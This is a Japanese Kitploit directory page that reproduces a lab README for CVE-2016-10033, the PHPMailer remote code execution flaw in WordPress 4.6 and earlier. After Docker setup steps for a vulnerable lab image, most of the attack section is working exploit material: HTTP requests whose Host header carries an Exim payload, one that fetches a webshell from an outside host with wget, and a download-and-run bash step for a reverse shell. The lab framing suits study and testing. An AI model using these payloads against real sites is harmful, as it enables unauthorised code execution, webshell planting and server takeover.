Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
WP-CVE-2016-10033 | Kitploit
ツール/GitHubGitHub/liusec/wp-cve-2016-10033
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発ラボと実践
GitHubliusec/wp-cve-2016-10033

WP-CVE-2016-10033

リポジトリを見る
19年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WordPress <= 4.6 コマンド実行の脆弱性(PHPMailer)(CVE-2016-10033)

脆弱性情報

WordPress は PHP 言語で開発されたブログプラットフォームであり、PHP と MySQL データベースをサポートするサーバー上で独自の Web サイトを構築できます。また、WordPress をコンテンツ管理システム(CMS)として使用することもできます。WordPress は PHPMailer コンポーネントを使用してユーザーにメールを送信します。PHPMailer(バージョン < 5.2.18)にはリモートコード実行の脆弱性が存在し、攻撃者は巧妙に悪意のあるメールアドレスを構築するだけで任意のファイルを書き込み、リモートコード実行の被害を引き起こす可能性があります。

影響を受けるバージョン

WordPress <= 4.6

イメージ情報

種類ユーザー名パスワード
Mysqlrootroot
/wp-admin/adminadmin123

環境の取得:

  1. イメージをローカルにプルする
root@kitploit:~
$ docker pull medicean/vulapps:w_wordpress_6
  1. 環境を起動する
root@kitploit:~
$ docker run -d -p 8000:80 medicean/vulapps:w_wordpress_6

-p 8000:80 の前の 8000 は物理マシンのポートを表します。任意に指定できます。

http://127.0.0.1:8000 にアクセスして WordPress のメイン画面が表示されれば起動成功です。

POC

ターゲットアドレスが http://127.0.0.1:8000/ の場合:

  1. 以下の HTTP リクエストを BurpSuite Repeater にコピーし、Go ボタンをクリックして、ターゲットの IP とポートを入力します(例:IP に 127.0.0.1、ポートに 80)
root@kitploit:~
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}vuln}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin
  1. http://127.0.0.1:8000/vuln にアクセスします。

返ってくるステータスコードが 200 であれば、/var/www/html/vuln ファイルが正常に作成されたことを意味します。

パケットを送信する前にこのアドレスにアクセスすると、404 が表示されます。

Exp

考え方:リモートの HTTP サーバー上にテキストファイルを作成し、wget を使用してターゲットマシンにダウンロードします。

ターゲットに WebShell を書き込む(強く非推奨)

コマンド実行ができるのに、WebShell を送る必要はない

  1. 以下のコマンドを実行します:
root@kitploit:~
/usr/bin/wget --output-document /var/www/html/webshell.php raw.githubusercontent.com/medicean/vulapps/master/w/wordpress/6/webshell.php

注意:

  1. リモート URL には http:// を含めない
  2. すべての文字は小文字にする
  3. すべての / を ${substr{0}{1}{$spool_directory}} に置き換える
  4. すべての空白を ${substr{10}{1}{$tod_log}} に置き換える

リクエストは以下のとおりです(実際の状況に応じて user_login を置き換えてください。デフォルトは admin です):

root@kitploit:~
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}webshell.php${substr{10}{1}{$tod_log}}raw.githubusercontent.com${substr{0}{1}{$spool_directory}}medicean${substr{0}{1}{$spool_directory}}vulapps${substr{0}{1}{$spool_directory}}master${substr{0}{1}{$spool_directory}}w${substr{0}{1}{$spool_directory}}wordpress${substr{0}{1}{$spool_directory}}6${substr{0}{1}{$spool_directory}}webshell.php}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin
  1. http://127.0.0.1:8000/webshell.php にアクセスします。

リバースシェル(推奨)

リモートのテキストファイルの内容が bash スクリプトの場合は、ターゲットにダウンロードした後、/bin/bash を使用してそのファイルを直接実行できます。

  1. bash スクリプトをターゲットにダウンロードする
root@kitploit:~
/usr/bin/wget --output-document /tmp/rce example.com/1.txt
  1. 実行
root@kitploit:~
/bin/bash /tmp/rce

関連リンク

  • WordPress Core 4.6 - Unauthenticated Remote Code Execution (RCE) PoC Exploit
ツールをダウンロード